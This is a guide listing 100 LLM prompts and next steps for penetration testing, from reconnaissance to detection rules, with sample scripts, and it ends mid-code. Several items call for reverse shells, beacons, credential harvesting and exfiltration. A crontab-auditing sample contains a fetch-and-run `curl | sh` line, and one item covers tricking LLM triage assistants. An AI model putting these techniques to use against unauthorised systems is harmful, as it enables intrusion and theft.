**100 concrete things to explore** when using LLMs to assist penetration testing
Each item has: a short description, an example LLM prompt you can use immediately, and a low-level next step (command, code snippet or approach) you can run or adapt. I grouped items into categories so you can pick a pathway (recon → exploit → post-exploit → automation → defenses). I also cite a few foundational open-source tools you’ll want to integrate LLM output with. (GitHub)
Quick note on safety: use these only on systems you own or have explicit permission to test. LLMs can accelerate offensive work — use responsibly.
Reconnaissance (1–18)
1. Passive OSINT profile of a target domain
   Prompt: “Collect open-source intelligence about example.com: subdomains, public cloud buckets, DNS history, leak pastebin hits.”
   Next step: run `subfinder`/`amass`, or have the LLM produce `amass enum -d example.com` plus a parsing script.
2. Enumerate subdomains using wordlists
   Prompt: “Generate a prioritized subdomain wordlist for example.com based on its business, technologies, and country.”
   Next step: feed the list into `massdns` for fast resolution, then port-scan the hosts that resolve with `naabu`.
3. Fingerprint web technologies from a homepage
   Prompt: “Given this HTTP response header and HTML, identify frameworks, versions and likely plugins.”
   Next step: LLM outputs fingerprint rules used to generate `whatweb`/`wappalyzer` signatures or custom regexes.
4. Find exposed Git metadata (`/.git`)
   Prompt: “Write a script that checks for /.git existence and pulls files safely (no destructive actions).”
   Next step: use `curl -sL http://target/.git/HEAD` and the LLM’s script to fetch only the files listed.
5. Locate cloud buckets and S3 misconfigurations
   Prompt: “Given the company name and region, produce candidate S3/bucket names and a check script for public read/list.”
   Next step: `aws s3api head-bucket --bucket candidate`, or LLM-produced Python using `boto3` with an anonymous client.
6. Profile email addresses and possible password reset flows
   Prompt: “Map public email formats, password-reset URLs, and CSP/anti-CSRF protections for staff@company.”
   Next step: LLM produces `curl` sequences to test password-reset endpoints and parse tokens.
7. Create prioritized vulnerability checklist
   Prompt: “Given technologies [Nginx, Django, Postgres], list high-probability CVEs and detection checks.”
   Next step: generate `nmap` NSE script commands or `cve-search` queries.
8. Map network ranges from DNS and BGP
   Prompt: “From these IPs and ASN, identify the likely upstream netblocks and cloud providers.”
   Next step: LLM produces `whois`, `bgpview` or `ipinfo` API call sequences.
9. Harvest JS files and analyze interesting functions
   Prompt: “Download JS files from /static and summarize functions that handle auth, tokens or crypto.”
   Next step: LLM outputs static-analysis heuristics and a Python script using `requests` plus AST parsing with `esprima`, or regex.
10. Detect API endpoints and parameters
    Prompt: “Given XHR request logs, extract REST endpoints, parameters, and possible injection points.”
    Next step: LLM formats a Burp/OWASP ZAP scanner policy or `curl` calls for fuzzing.
11. Detect leaked credentials in commits
    Prompt: “Write a program to scan discovered Git history for AWS keys, with safe false-positive filters.”
    Next step: LLM produces a `git log -p` parser plus regexes for AWS key patterns (`-p` is needed so the patch content, not just the commit metadata, is scanned).
12. Create adaptive reconnaissance playbook
    Prompt: “Write a reconnaissance playbook that adapts based on results (e.g., if WordPress found → run plugin enumeration).”
    Next step: export as YAML for an automation tool such as Ansible, or as a Makefile or Python orchestration script.
13. Use LLM to triage open ports
    Prompt: “Given a list of open ports from Nmap, rank them by likely exploitability and suggest exact fingerprint commands.”
    Next step: LLM suggests `nmap -sV --script` lines and prioritized exploits.
14. Construct targeted search engine dorks
    Prompt: “Produce Google dorks / Bing queries to find documents, exposed dashboards, or backup files for example.com.”
    Next step: LLM returns a list; validate it manually and don’t run automated scraping of search engines.
15. Generate prioritized wordlists for brute force
    Prompt: “Build a prioritized username + password list for company using naming conventions and public bios.”
    Next step: use `hydra` or `crowbar` with rate limits and the LLM’s list.
16. Discover mobile app endpoints from APKs
    Prompt: “Given an APK package name, extract server endpoints and API-key placeholders, and create a static analysis script.”
    Next step: LLM suggests `jadx` commands and regexes to extract endpoints from `strings.xml`/`build.gradle`.
17. Identify likely CI/CD pipeline leakage
    Prompt: “List signs in repo/site that indicate CI secrets leaked (e.g., webhook URLs, artifacts).”
    Next step: LLM outputs regexes and `git grep` commands to run on mirrored repos.
18. Threat modeling of the target
    Prompt: “Create a STRIDE/attack-tree for e-commerce site: asset list, attacker goals, and high-probability attack paths.”
    Next step: LLM emits a JSON attack tree usable by risk management tools.
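
To make the “Detect leaked credentials in commits” item above concrete, here is a minimal sketch of the regex side. It assumes you have already saved patch output (for example from `git log -p`) as text. The function name `find_aws_key_ids`, the placeholder set, and the sample patch are hypothetical and only for illustration; the regex covers access key IDs only, not secret keys.

```python
import re

# AWS access key IDs are 20 characters: a prefix such as AKIA (long-term)
# or ASIA (temporary) followed by 16 uppercase letters or digits.
KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")

# Hypothetical false-positive filter: placeholder keys that appear in documentation.
KNOWN_PLACEHOLDERS = {"AKIAIOSFODNN7EXAMPLE"}


def find_aws_key_ids(patch_text):
    """Return (line_number, key_id) for each added line that contains a key ID."""
    hits = []
    for lineno, line in enumerate(patch_text.splitlines(), start=1):
        # In patch output, added lines start with '+'; '+++' marks a file header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for key_id in KEY_ID_RE.findall(line):
            if key_id not in KNOWN_PLACEHOLDERS:
                hits.append((lineno, key_id))
    return hits


# Made-up sample patch: one fake key, one documentation placeholder, one removed line.
sample_patch = """\
+++ b/config.py
+AWS_KEY = "AKIAABCDEFGHIJKLMNOP"
+DOC_KEY = "AKIAIOSFODNN7EXAMPLE"
-OLD = "AKIAZZZZZZZZZZZZZZZZ"
"""
print(find_aws_key_ids(sample_patch))
```

Scanning only added lines keeps the noise down, but a key that was added and later removed still shows up, which is usually what you want when reviewing history.
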
Scanning & Service Enumeration (19–32)
19. Automate port/service scanning workflow
    Prompt: “Write a pipeline: host discovery → fast port scan → service detection → vuln scan; include command examples.”
    Next step: `nmap -sn` → `naabu -p -` → `nmap -sV -sC`, with the LLM producing the wrapper script.
20. Generate tuned Nmap scan profiles
    Prompt: “Produce Nmap command tuned for stealth vs speed for a given target and network conditions.”
    Next step: for example, stealth `nmap -sS -Pn -T2 -p-` vs fast `nmap -T4 -p- --min-rate <rate>`.
21. Write custom NSE scripts with LLM assistance
    Prompt: “Generate an Nmap NSE script that checks for exposed `.git` repositories and fetches HEAD only.”
    Next step: LLM outputs an NSE skeleton (Lua); save it as a `.nse` file and run `nmap --script ./check-git.nse`.
22. Automate banner/protocol fuzzing
    Prompt: “Create a small Python fuzzer for FTP commands to find parsing crashes.”
    Next step: LLM provides a `socket`-based fuzzer that mutates commands and logs responses.
23. Service fingerprinting via active probes
    Prompt: “List active probes to differentiate Apache/Tomcat/nginx even when headers are modified.”
    Next step: LLM suggests probes (error pages, HTTP methods, OPTIONS, TRACE) and regexes for responses.
24. Enumerate SMB and Windows shares safely
    Prompt: “Write a script using Impacket to list SMB shares and check anonymous access.”
    Next step: LLM provides an `impacket.smbconnection` usage example to call from Python. (GitHub)
25. Automate SSH host key collection and weak config detection
    Prompt: “Collect SSH host keys and test for weak kex/ciphers and password auth enabled.”
    Next step: LLM outputs an `ssh-audit` invocation or `nmap --script ssh2-enum-algos`.
26. Identify exposed databases and default credentials
    Prompt: “Scan for exposed database ports and attempt safe read-only queries using known creds list.”
    Next step: LLM provides connection strings and `psql -h host -U user -c '\l'` or `mysql -e 'SHOW DATABASES;'`.
27. Web service parameter enumeration
    Prompt: “Given endpoint /api/search?q=, create a list of parameters to probe and a fuzzing policy.”
    Next step: integrate with `ffuf` or `wfuzz` using the LLM’s generated wordlists.
28. TLS & certificate analysis
    Prompt: “Analyze the target’s TLS chain for weak ciphers, expired intermediates, and misissued certs.”
    Next step: run `openssl s_client -connect host:443 -showcerts` and have the LLM parse the output into findings.
29. SSH/HTTP timing analysis for side channels
    Prompt: “Create a test harness that measures response timing differences to detect username enumeration.”
    Next step: LLM outputs Python with `requests` timing and a statistical test (t-test).
30. Identify exposed CI artifacts (Docker images, registries)
    Prompt: “Scan for open container registries and attempt to list repositories (read-only).”
    Next step: `curl -s https://registry.example.com/v2/_catalog`, or the LLM’s script with pagination.
31. Find insecure service configurations (default pages, debug endpoints)
    Prompt: “Detect common debug endpoints: /debug, /actuator, /env, /wp-admin/admin-ajax.php; prioritize by probability.”
    Next step: LLM outputs `ffuf -w` patterns to scan.
32. Integrate scanner outputs into single JSON
    Prompt: “Write a parser that normalizes Nmap, OpenVAS and Burp output into a single JSON vulnerability inventory.”
    Next step: LLM returns Python using `xmltodict` and mapping rules.
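
As a sketch of the “Integrate scanner outputs into single JSON” item above, the snippet below flattens Nmap XML (as written by `nmap -oX`) into a list of records. It swaps in the standard library’s `xml.etree.ElementTree` for `xmltodict` so it runs without extra installs. The record field names and the embedded sample XML are assumptions for illustration; OpenVAS and Burp would each need their own mapping function that emits the same record shape.

```python
import json
import xml.etree.ElementTree as ET

# Trimmed, made-up sample in the shape of `nmap -oX` output.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def normalize_nmap(xml_text):
    """Flatten Nmap XML into a list of open-service records."""
    records = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else None
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # keep only ports reported as open
            svc = port.find("service")
            records.append({
                "source": "nmap",
                "host": addr,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return records


inventory = normalize_nmap(SAMPLE_NMAP_XML)
print(json.dumps(inventory, indent=2))
```

Keeping a `source` field on every record makes it easy to merge and de-duplicate findings once other scanners feed the same inventory.
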
Web Application Testing (33–54)
33. Automate SQL injection detection and payload generation
    Prompt: “Given an endpoint and parameter, produce SQLi payload sequences (boolean, time-based, error) and detection logic.”
    Next step: integrate with `sqlmap`, or use the LLM’s payloads for `requests` fuzzing. (GitHub)
34. LLM-assisted parameter pollution tests
    Prompt: “Generate test cases for HTTP parameter pollution and duplicate parameter handling.”
    Next step: LLM outputs `curl` or Burp Intruder payload sets.
35. Cross-site scripting (XSS) payload synthesis
    Prompt: “Create context-aware XSS payloads for HTML body, attribute, JS, and JSON contexts, with encodings.”
    Next step: LLM provides strings; test with `ffuf`, using `-mr` to match on reflection.
36. CSRF detection and exploit generation
    Prompt: “Find forms without CSRF tokens and produce an HTML exploit that automatically submits.”
    Next step: LLM crafts the exploit HTML form for proof-of-concept.
37. Auth bypass and logic flaws
    Prompt: “Given a login flow with step descriptions, find logic race or sequence bugs (e.g., email change without reauth).”
    Next step: LLM proposes test sequences and replay scripts.
38. Automate forced browsing / hidden links discovery
    Prompt: “Enumerate hidden endpoints via JS parsing, sitemap, robots.txt and brute force.”
    Next step: LLM provides a `wget`/`grep` pipeline to extract URLs and pass them to `ffuf`.
39. Header injection and host header attacks
    Prompt: “Generate attacks that manipulate Host, X-Forwarded-For and other headers to test trust boundaries.”
    Next step: LLM supplies `curl -H` commands and expected server behaviors.
40. Automate file upload bypasses
    Prompt: “Create a list of bypasses for file extension/content checks (double extension, content sniffing, magic bytes).”
    Next step: LLM provides a Python script that crafts multipart uploads with altered headers and magic bytes.
41. Detect insecure deserialization
    Prompt: “Explain how to probe Java/PHP/Python deserialization endpoints and generate proof-of-concept payloads.”
    Next step: LLM produces `ysoserial`/`PHPGGC` usage or serialized payload templates.
42. API abuse: excessive rate and logic manipulation
    Prompt: “Design test cases to abuse pagination, bulk endpoints, and quota systems.”
    Next step: LLM generates scripts using `aiohttp` for concurrency and test orchestration.
43. SSRF detection and exploitation workflow
    Prompt: “Find SSRF via URL-type parameters and craft OOB detection using collaborators (Burp Collaborator / interactsh).”
    Next step: LLM supplies `curl` calls that point the URL parameter at interactsh payloads.
44. Auth token analysis (JWT)
    Prompt: “Given a JWT, decode, check algorithms (alg none), critical claims, and craft a forge test.”
    Next step: LLM gives code such as `jwt.decode(tok, options={"verify_signature": False})` and a script to alter `alg`.
45. Automate business-logic testcases
    Prompt: “Given e-commerce flow, generate tests for price manipulation, discount stacking, and inventory race conditions.”
    Next step: LLM outputs sequences and sample HTTP bodies for concurrent requests.
46. Plugin and framework exploit hunting (WordPress, Drupal)
    Prompt: “If WordPress vX.Y is detected, list high-probability vulnerable plugins and proof-of-concept checks.”
    Next step: LLM drafts `wpscan` args and plugin enumeration strategies.
47. Identify insecure CORS configurations
    Prompt: “Given response headers, evaluate CORS policy and craft a malicious origin exploit if vulnerable.”
    Next step: LLM builds a PoC HTML that performs an XHR from a malicious origin.
48. Automated Content Security Policy (CSP) analysis
    Prompt: “Analyze CSP header and report misconfigurations that allow inline script execution or unsafe eval.”
    Next step: LLM outputs canonical checks and mitigation suggestions.
49. Automate detection of backup files and source leaks
    Prompt: “Create checks for typical backup filenames (.bak, .swp, ~, .sql.gz) and crawling policy.”
    Next step: LLM provides an `ffuf -w` template for backup discovery.
50. Use LLM to write Burp extensions
    Prompt: “Generate a Burp extension (Jython or Java) to detect a custom token pattern and highlight requests.”
    Next step: LLM outputs an extension skeleton; compile it and load it into Burp Extender (note: Burp API required).
51. GraphQL security exploration
    Prompt: “Enumerate GraphQL schema, generate introspection queries, and create complexity/fuzzing tests.”
    Next step: LLM crafts `curl -X POST -d '{"query":"{__schema{types{name}}}"}'` and rate/complexity tests.
52. SSO and OAuth misconfiguration testing
    Prompt: “Test for open redirectors, weak client secrets, and scope escalation in OAuth flows.”
    Next step: LLM generates OAuth flow sequences and checklists for redirect URIs.
53. Automated detection of client-side logic vulnerabilities
    Prompt: “Find dangerous client-side evals, dynamic script insertion points and CSP bypass vectors.”
    Next step: LLM gives regexes to find `eval(`, `new Function`, `innerHTML =`.
54. Fuzz JSON and binary endpoints with context-awareness
    Prompt: “Create a grammar-aware fuzzer for JSON APIs that mutates specific fields intelligently.”
    Next step: LLM outputs a Python grammar mutation engine using `jsonschema` to keep valid shapes.
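
For the “Automated Content Security Policy (CSP) analysis” item above, the checks an LLM proposes can be turned into a small auditor like this one. It is a minimal sketch that only looks at script-related directives; the function names and finding strings are made up for illustration, and a real review would cover more directives (`object-src`, `base-uri`, and so on).

```python
def parse_csp(header_value):
    """Parse a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        # When a directive is repeated, only its first occurrence is kept.
        policy.setdefault(name, tokens[1:])
    return policy


def audit_csp(header_value):
    """Return human-readable findings for script-related weaknesses."""
    policy = parse_csp(header_value)
    findings = []
    # script-src falls back to default-src when it is absent.
    script_sources = policy.get("script-src", policy.get("default-src"))
    if script_sources is None:
        findings.append("no script-src or default-src: scripts are unrestricted")
        return findings
    lowered = [s.lower() for s in script_sources]
    # Browsers ignore 'unsafe-inline' when a nonce or hash source is present.
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered
    )
    if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
        findings.append("'unsafe-inline' allows inline script execution")
    if "'unsafe-eval'" in lowered:
        findings.append("'unsafe-eval' allows eval() and similar sinks")
    for broad in ("*", "http:", "https:", "data:"):
        if broad in lowered:
            findings.append(f"overly broad script source: {broad}")
    return findings


header = "default-src 'self'; script-src 'self' 'unsafe-inline' https:; object-src 'none'"
for finding in audit_csp(header):
    print(finding)
```

Feeding the findings list back to the LLM together with the raw header is a reasonable way to get the mitigation suggestions the item mentions.
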
Exploit Development & Binary Testing (55–69)
55. Use LLMs to write exploit skeletons from CVEs
    Prompt: “Given CVE-YYYY-NNNN details, produce an exploit skeleton in Python and explain required adjustments.”
    Next step: LLM outputs a proof-of-concept and guidance to adapt offsets and gadgets.
56. Automate buffer-overflow triage
    Prompt: “Given a crash log and core dump, produce steps to find the crash point, register state and possible exploit vectors.”
    Next step: LLM suggests `gdb` commands and `pwndbg` checks (use pwntools for payloads). (GitHub)
57. Create ROP gadget chains automatically
    Prompt: “Automate gadget discovery and chain generation for a given binary and ABI.”
    Next step: LLM produces `ropper` commands or radare2 `/R` gadget searches, and shows how to combine gadgets with `pwntools`.
58. Automate format-string exploit generation
    Prompt: “Given a format-string leak and memory layout, generate payloads to write to arbitrary addresses.”
    Next step: LLM outputs `printf`-based write plans (via `%n`) and example exploit code.
59. Binary instrumentation harness generation
    Prompt: “Create an AFL/LibFuzzer harness for this library function with seed corpus and sanitizer flags.”
    Next step: LLM emits a C harness, compile flags, and suggestions for ASAN/UBSAN.
60. Automate heap spraying / heap feng shui scenarios
    Prompt: “Given a vulnerable allocator, produce a sequence to shape the heap layout prior to the vulnerability trigger.”
    Next step: LLM outlines `malloc`/`free` patterns and example PoC code in C.
61. Symbolic execution harness with angr
    Prompt: “Write an angr script to find inputs that reach a vulnerable function.”
    Next step: LLM returns an `angr` skeleton (project load, entry state, exploration).
62. Automate reverse shell payload creation
    Prompt: “Generate a platform-aware reverse shell payload in C/Python that avoids null bytes and explains constraints.”
    Next step: LLM produces shellcode or a small binary wrapper; test in a controlled VM.
63. Exploit reliability improvements
    Prompt: “How to add heap-spray, retries, and NOP sleds to improve exploit stability across ASLR variations.”
    Next step: LLM provides code patterns and fallback sequences.
64. Automate gadget finding with ROPgadget/objdump
    Prompt: “Find gadgets for x86_64 and generate a minimal payload to call system(‘/bin/sh’).”
    Next step: LLM gives `ROPgadget --binary=binary` and `pwntools` payload assembly.
65. Write kernel exploit triage checklist
    Prompt: “Given a kernel crash log (oops), produce a triage plan for exploitability and required environment.”
    Next step: LLM lists required kernel symbols, debug info and harness suggestions.
66. Automate exploit verification and sandboxing
    Prompt: “Create a VM automation script to safely run an exploit and capture network callbacks.”
    Next step: LLM outputs `Vagrant`/`libvirt` or `docker` commands to spin up a test environment.
67. Fuzz network protocol implementations
    Prompt: “Construct a grammar fuzzer for a custom TCP protocol with stateful interactions.”
    Next step: LLM provides a Python harness using `scapy`/`boofuzz`.
68. Binary patch generation script
    Prompt: “Given a patch diff, generate a binary patch (bspatch/bsdiff) and test script.”
    Next step: LLM explains `objdump`/`ldd` checks and provides `bspatch` usage.
69. Automate symbolic patch detection across versions
    Prompt: “Detect changed functions between binary versions to find likely fixed vulnerabilities.”
    Next step: LLM outputs `radiff2` or `BinDiff` automation hints.
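
For the “Automate buffer-overflow triage” item above, one step an LLM will typically suggest is finding which input offset landed in a register at crash time. pwntools ships helpers for this; the sketch below is a dependency-free stand-in that uses the classic `Aa0Aa1Aa2...` pattern instead, and `make_pattern` and `find_offset` are illustrative names, not pwntools APIs. It assumes a 32-bit register value read from the debugger.

```python
import string
import struct
from itertools import islice, product

MAX_PATTERN_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def make_pattern(length):
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    if not 0 <= length <= MAX_PATTERN_LEN:
        raise ValueError(f"length must be between 0 and {MAX_PATTERN_LEN}")
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    needed = (length + 2) // 3  # number of 3-byte chunks, rounded up
    text = "".join("".join(t) for t in islice(triples, needed))
    return text[:length].encode("ascii")


def find_offset(register_value, pattern, little_endian=True):
    """Locate a 32-bit register value (as shown by a debugger) inside the pattern."""
    needle = struct.pack("<I" if little_endian else ">I", register_value)
    return pattern.find(needle)  # -1 if the value did not come from the pattern


pattern = make_pattern(300)
# Simulate a crash in which input bytes 112..115 ended up in a register.
crashed_value = struct.unpack("<I", pattern[112:116])[0]
print(find_offset(crashed_value, pattern))
```

In a real triage session you would send `pattern` as the input in your lab VM, read the faulting register from `gdb`, and pass that value to `find_offset`.
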
Post-exploitation & Lateral Movement (70–81)
70. Password/credential harvesting automation
    Prompt: “Given access to a Windows host, enumerate cached credentials, DPAPI blobs and LSA secrets safely.”
    Next step: LLM references commands and Impacket/PowerSploit equivalents (note: use only in an allowed environment). (GitHub)
71. Automate persistence checks and proof scripts
    Prompt: “List common persistence mechanisms on Linux and Windows and produce detection queries.”
    Next step: LLM gives `systemd` service checks, cron, startup folder scans.
72. Enumerate Active Directory via LDAP and Kerberos
    Prompt: “Create an Impacket/LDAP script to enumerate users, groups, SPNs, and test for unconstrained delegation.”
    Next step: LLM outputs `impacket/examples/GetUserSPNs.py`-style usage and parsing. (GitHub)
73. Kerberoasting and AS-REP roasting workflows
    Prompt: “Implement a Kerberoast/AS-REP roast PoC using Impacket and explain decryption steps.”
    Next step: LLM generates commands and example `hashcat` cracking modes.
74. SSH pivot automation and SOCKS chaining
    Prompt: “Create an SSH-based pivot script that sets up dynamic port forwarding and routes traffic through compromised host.”
    Next step: LLM outputs `ssh -D 1080 -N -f user@host` and a `proxychains` config.
75. Automated lateral movement via SMB/PSExec
    Prompt: “Given valid creds, automate remote command execution using SMB and SMBNamedPipe (impacket psexec).”
    Next step: LLM gives `impacket/examples/psexec.py` usage and safe logging.
76. Data exfiltration simulation (safe)
    Prompt: “Simulate an exfil test with staged and encrypted channels to a test collector, minimize noise.”
    Next step: LLM suggests chunking, AES encryption, and timing obfuscation.
77. Credential replay detection
    Prompt: “Create SIEM detections for unusual Kerberos TGS requests and replay patterns.”
    Next step: LLM outputs sample Sigma rules.
78. Automate cleanup & forensic artifacts generation
    Prompt: “List files, registry keys, and logs that an operator must clear after lateral movement (for simulation).”
    Next step: LLM provides scripts to revert changes in an isolated lab.
79. Build automated discovery of Windows GPOs and security settings
    Prompt: “Enumerate GPO applied settings and privileges to find likely weak local admin configurations.”
    Next step: LLM provides PowerShell commands (`Get-GPOReport`) and parsing.
80. Privilege escalation toolkit automation
    Prompt: “Given kernel & installed software versions, suggest likely local privilege escalation paths and PoCs.”
    Next step: LLM references local exploits (search terms) and suggests a safe testing harness.
81. Deploy beacon / callback frameworks for testing
    Prompt: “Generate a minimal HTTPS beacon that sleeps and polls for commands; include JARM-friendly options.”
    Next step: LLM gives a C/Python/Go beacon skeleton (use only in permitted tests).
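
For the “Automate persistence checks and proof scripts” item above, the cron part of a detection pass might look like the sketch below. The three heuristics in `SUSPICIOUS_PATTERNS` are assumptions picked for illustration, not a vetted rule set, and the sample crontab is made up; expect to tune both for the environment you are checking.

```python
import re

# Hypothetical heuristics, chosen for illustration only.
SUSPICIOUS_PATTERNS = {
    "pipe-to-shell download": re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b"),
    "runs from world-writable dir": re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/\S+"),
    "base64-decoded command": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}


def audit_crontab(text):
    """Return (line_number, reason, line) for crontab entries matching a heuristic."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        for reason, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, reason, line))
    return findings


sample = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.7/u.sh | sh
@reboot /tmp/.cache/agent
"""
for finding in audit_crontab(sample):
    print(finding)
```

The same loop works for systemd unit files or shell profiles if you swap in patterns for `ExecStart=` lines or sourced scripts.
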
Automation, Orchestration & LLM-Specific (82–95)
82. LLM prompt engineering for vuln triage
    Prompt: “Given scan output, produce a short classification (false pos/likely vuln/needs manual check) and remedial steps.”
    Next step: LLM can output a triage JSON mapping fields to priority.
83. LLM as an interactive pentest assistant (chat agent)
    Prompt: “Build an agent that loads scanner output, accepts questions, and issues follow-up scanner commands.”
    Next step: LLM provides the architecture: vector store for context, tool calls to `nmap`/`sqlmap`, and prompt templates.
84. Automate exploit parameter extraction from PoCs
    Prompt: “Parse a text PoC and extract targets, offsets, required versions, and build a checklist.”
    Next step: LLM returns structured data that can feed CI pipelines.
85. Create LLM-driven fuzzing hypotheses
    Prompt: “Propose likely malformed inputs for this API based on observed parsing behavior.”
    Next step: generate grammar rules used by `boofuzz`/`afl` harnesses.
86. LLM building of YARA rules from observed malware artifacts
    Prompt: “Given sample strings and file metadata, create a tight YARA rule with metadata and tags.”
    Next step: LLM emits YARA syntax and a test harness for the `yara` CLI.
87. Integrate LLMs with CI for continuous pentest scans
    Prompt: “Design a pipeline that runs scheduled scans, then uses an LLM to triage and open JIRA tickets.”
    Next step: LLM outputs YAML for GitHub Actions or GitLab CI that calls scanners and posts results.
88. LLM to convert natural language findings into exploit scripts
    Prompt: “Translate this finding: ‘SQLi at /search?q=’ into a runnable exploit script that tests payload set A.”
    Next step: LLM produces a `requests`-based PoC and `sqlmap` commands.
89. Automate report drafting from raw findings
    Prompt: “Produce an executive summary + technical appendix from the following JSON scanner output.”
    Next step: LLM transforms it into markdown or PDF-ready sections.
90. Create guided remediation guides with code fixes
    Prompt: “Given this XSS proof-of-concept, generate framework-specific fixes (Django, Express) and code patches.”
    Next step: LLM outputs code diffs and patch commands.
91. LLM to summarize patch diff & exploitability
    Prompt: “Given a GitHub commit diff, explain if it fixes an RCE and how an attacker abused it.”
    Next step: LLM highlights lines and suggested tests.
92. Train a lightweight local LLM with your pentest corpus
    Prompt: “How to fine-tune a small model on my internal PoC and scan logs to improve recommendations?”
    Next step: LLM produces data curation steps (anonymize, label) and training script hints.
93. Create a plugin that turns LLM suggestions into Burp intruder payloads
    Prompt: “Generate a Burp extension that takes LLM output, formats it into an Intruder payload set and starts attack.”
    Next step: LLM gives an extension skeleton and API use.
94. Automate regulatory & compliance mapping for findings
    Prompt: “Map each vulnerability to OWASP Top10, PCI DSS, and recommended CIS control.”
    Next step: LLM outputs a mapping table and remediation priority.
95. Adversarial prompt testing for LLMs used in triage
    Prompt: “Design tests to show how an LLM triage assistant can be tricked by adversarial artifacts.”
    Next step: LLM suggests test cases and mitigations (input sanitization, TTL for context).
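
For the “LLM prompt engineering for vuln triage” item above, and as one of the input-checking mitigations from the adversarial-testing item, it helps to validate the model’s triage JSON before anything downstream consumes it. The field names, the three class labels, and the 1 to 5 priority scale below are assumptions for this sketch; adapt them to whatever schema your prompt asks for.

```python
import json

# Assumed schema for this sketch; align it with your own triage prompt.
ALLOWED_CLASSES = {"false_positive", "likely_vuln", "needs_manual_check"}
REQUIRED_FIELDS = {
    "finding_id": str,
    "classification": str,
    "priority": int,
    "remediation": str,
}


def parse_triage(raw_reply):
    """Validate a model's triage reply; raise ValueError on anything unexpected."""
    try:
        data = json.loads(raw_reply)
    except json.JSONDecodeError as exc:
        raise ValueError(f"reply is not valid JSON: {exc}") from exc
    if not isinstance(data, dict):
        raise ValueError("reply must be a JSON object")
    unknown = set(data) - set(REQUIRED_FIELDS)
    if unknown:
        raise ValueError(f"unexpected fields: {sorted(unknown)}")
    for field, expected_type in REQUIRED_FIELDS.items():
        if field not in data:
            raise ValueError(f"missing field: {field}")
        value = data[field]
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(value, bool) or not isinstance(value, expected_type):
            raise ValueError(f"field {field} must be {expected_type.__name__}")
    if data["classification"] not in ALLOWED_CLASSES:
        raise ValueError(f"unknown classification: {data['classification']!r}")
    if not 1 <= data["priority"] <= 5:
        raise ValueError("priority must be between 1 and 5")
    return data


reply = (
    '{"finding_id": "F-12", "classification": "likely_vuln", '
    '"priority": 2, "remediation": "Parameterize the query."}'
)
print(parse_triage(reply)["classification"])
```

Rejecting unknown fields and labels means a reply steered by text embedded in scanner output fails loudly instead of silently opening or closing tickets.
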
Detection, Blue Team, and Defensive Use (96–100)
96. Generate detection signatures from PoC network IOCs
    Prompt: “From this exploit’s network behavior, generate Snort/Suricata rules and Zeek scripts.”
    Next step: LLM outputs rule examples and a testing pcap harness.
97. Convert findings to Sigma, YARA, and Suricata rules
    Prompt: “Produce a Sigma rule to detect suspicious Windows command lines seen in PoC.”
    Next step: LLM emits Sigma YAML and a test event to validate.
98. Automate threat hunting playbooks
    Prompt: “Given a lateral movement PoC, create a step-by-step hunt playbook for SOC analysts.”
    Next step: LLM returns a checklist, queries for Splunk/ELK and exact fields.
99. Hardening scripts for typical misconfigurations
    Prompt: “Provide idempotent Ansible/PowerShell scripts to remediate the top 10 findings in this scan.”
    Next step: LLM generates Ansible roles and PowerShell DSC snippets.
100. Blue/Red team tabletop automation
     Prompt: “Create a tabletop scenario that simulates exploitation of an exposed app, with detection triggers and automated scoring.”
     Next step: LLM produces a scenario timeline, detection rules, and scoring rubric.
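
For the “Convert findings to Sigma, YARA, and Suricata rules” item above, you can sanity-check a rule against the test event the LLM emits before loading it into a SIEM. The sketch below is not a Sigma engine: it handles a single selection written as a Python dict, with case-insensitive `contains`, `startswith`, `endswith` and exact-match checks. The field names and patterns are illustrative assumptions modeled on process-creation events.

```python
# Simplified stand-in for one Sigma selection: every field must match (AND),
# and a field matches if ANY of its listed patterns matches (OR).
SELECTION = {
    "Image|endswith": ["\\powershell.exe"],
    "CommandLine|contains": ["-enc ", "-encodedcommand ", "downloadstring("],
}


def field_matches(value, modifier, patterns):
    """Case-insensitive match of one event field against a list of patterns."""
    value = str(value).lower()
    checks = {
        "contains": lambda p: p in value,
        "endswith": lambda p: value.endswith(p),
        "startswith": lambda p: value.startswith(p),
        "equals": lambda p: value == p,
    }
    if modifier not in checks:
        raise ValueError(f"unsupported modifier: {modifier}")
    return any(checks[modifier](p.lower()) for p in patterns)


def event_matches(event, selection):
    """True if every key in the selection matches the event."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        if not field_matches(event[field], modifier or "equals", patterns):
            return False
    return True


suspicious_event = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
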